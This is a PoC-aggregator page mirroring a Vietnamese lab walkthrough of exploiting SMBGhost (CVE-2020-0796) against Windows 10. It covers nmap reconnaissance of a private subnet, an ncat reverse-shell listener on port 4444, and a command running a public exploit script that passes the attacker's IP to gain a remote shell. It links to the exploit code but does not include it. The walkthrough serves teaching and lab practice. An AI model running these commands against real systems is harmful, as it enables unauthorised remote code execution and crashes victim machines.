POC详情: 7d666e0dbc3e203d285614d9642c5c018c18d20f

来源
关联漏洞
标题: 微软 Microsoft SMBv3 缓冲区错误漏洞 (CVE-2020-0796)
描述:Microsoft SMBv3是美国微软(Microsoft)公司的一个为设备提供SMB功能的支持固件。 Microsoft Server Message Block 3.1.1 (SMBv3)版本中存在缓冲区错误漏洞,该漏洞源于SMBv3协议在处理恶意压缩数据包时,进入了错误流程。远程未经身份验证的攻击者可利用该漏洞在应用程序中执行任意代码。以下产品及版本受到影响:Microsoft Windows 10版本1903,Windows Server版本1903,Windows 10版本1909,Windo
介绍
***- Các phiên bản bị ảnh hưởng\**

\-    Windows 10 Version 1903 for 32-bit Systems

\-    Windows 10 Version 1903 for ARM64-based Systems

\-    Windows 10 Version 1903 for x64-based Systems

\-    Windows 10 Version 1909 for 32-bit Systems

\-    Windows 10 Version 1909 for ARM64-based Systems

\-    Windows 10 Version 1909 for x64-based Systems

\-    Windows Server, version 1903 (Server Core installation)

\-    Windows Server, version 1909 (Server Core installation)

### Sơ đồ kết nối hệ thống

![image-20240223154022321](https://github.com/hungdnvp/POC-CVE-2020-0796/blob/main/Screenshot_1.png?raw=true)

## Trinh sát mục tiêu

**Khởi chạy Nmap để quét dải mạng ở vùng DMZ**

```
map -sS 192.168.116.0/24
```

nmap: Là tên của chương trình quét mạng**.**

-sS: Chọn phương pháp quét TCP SYN scan. Trong quét này, Nmap gửi một gói tin SYN đến máy chủ đích và quan sát phản hồi. Nếu máy chủ đích trả lời với gói tin SYN-ACK, Nmap biết rằng cổng đó đang mở. Nếu máy chủ đích trả lời bằng một gói tin RST, nghĩa là cổng đó đã đóng.

-192.168.116.0/24: Địa chỉ IP hoặc dải địa chỉ IP cụ thể mà bạn muốn quét. Trong trường này, dải địa chỉ là 192.168.116.0/24, mô tả tất cả các địa chỉ IP từ 192.168.116.1 đến 192.168.116.254.

![image-scanNmap](https://github.com/hungdnvp/POC-CVE-2020-0796/blob/main/Screenshot_2.png?raw=true)

=> Quan sát thấy địa chỉ ip máy victim 192.116.145 đang mở cổng 445.

· **Sử dụng Nmap để quét lỗ hổng trên máy victim**

```
map -p445 –script smb-protocols 192.168.116.145
```

nmap: Là tên của chương trình quét mạng. 

-p445: Chỉ định cổng cụ thể để quét, trong trường hợp này là cổng 445. Cổng 445 thường được sử dụng để giao tiếp với dịch vụ SMB (Server Message Block) trên hệ thống Windows.

--script smb-protocols: Chọn kịch bản (script) smb-protocols để thực hiện quét. Kịch bản này giúp kiểm tra và hiển thị thông tin về các phiên bản giao thức SMB được hỗ trợ trên máy chủ đích.

192.168.116.145: Địa chỉ IP của máy chủ mà bạn muốn quét. Trong trường này, địa chỉ IP được thiết lập là 192.168.116.145

![image-sanNmap2](https://github.com/hungdnvp/POC-CVE-2020-0796/blob/main/Screenshot_3.png?raw=true)

\-    Kết quả thu được **smb-protocols** máy victim có khả năng tồn tại lỗ hổng có khả năng khai thác SMBv3.1.1

\-    Để chắc chắn hơn tiếp tục kiểm tra khả năng khai thác lỗ hổng CVE-2020-0796 bằng việc chạy script python 

[]: \-https://github.com/ly4k/SMBGhost	"mã khai thác"

![image-nmapcheck](https://github.com/hungdnvp/POC-CVE-2020-0796/blob/main/Screenshot_4.png?raw=true)

=> Kết quả **Vulnerable ->** phát hiện lỗ hổng CVE 2020-0796 có khả năng khai thác trên máy victim.

## Khai thác lỗ hổng, cài đặt mã độc, tạo kênh điều khiển từ xa

\**Tiến hành tấn công Reverse_shell**

* Khởi động session bằng **Netcat** lắng nghe phiên kết nối từ victim*

```
ncat -lvp 4444
```

* Khởi chạy script khai thác CVE-2020-0796

[]: https://github.com/jamf/CVE-2020-0796-RCE-POC	"mã khai thác"

```
python SMBleedingGhost.py 192.168.116.145 192.168.44.3 4444
```

![image-attack](https://github.com/hungdnvp/POC-CVE-2020-0796/blob/main/Screenshot_5.png?raw=true)

=>	 **KẾT QUẢ:** Máy tấn công chiếm quyền thực thi shell code trên máy victim.

![image-result](https://github.com/hungdnvp/POC-CVE-2020-0796/blob/main/Screenshot_6.png?raw=true)

Sau khi kết nối thành công, lúc này attacker có thể khai thác và thực thi mã tùy ý trên máy victim với quyền User của người dùng trong phiên kết nối.

**Khi kết thúc phiên. Máy victim bị lỗi BlueScreen và auto Restart.**

![image-end](https://github.com/hungdnvp/POC-CVE-2020-0796/blob/main/Screenshot_7.png?raw=true)

***Việc thực hiện khai thác có thể dẫn đến Làm hỏng hệ thống được nhắm mục tiêu\*** 
文件快照

[4.0K] /data/pocs/7d666e0dbc3e203d285614d9642c5c018c18d20f ├── [4.3K] README.md ├── [114K] Screenshot_1.png ├── [126K] Screenshot_2.png ├── [100K] Screenshot_3.png ├── [ 96K] Screenshot_4.png ├── [189K] Screenshot_5.png ├── [ 47K] Screenshot_6.png └── [ 71K] Screenshot_7.png 0 directories, 8 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。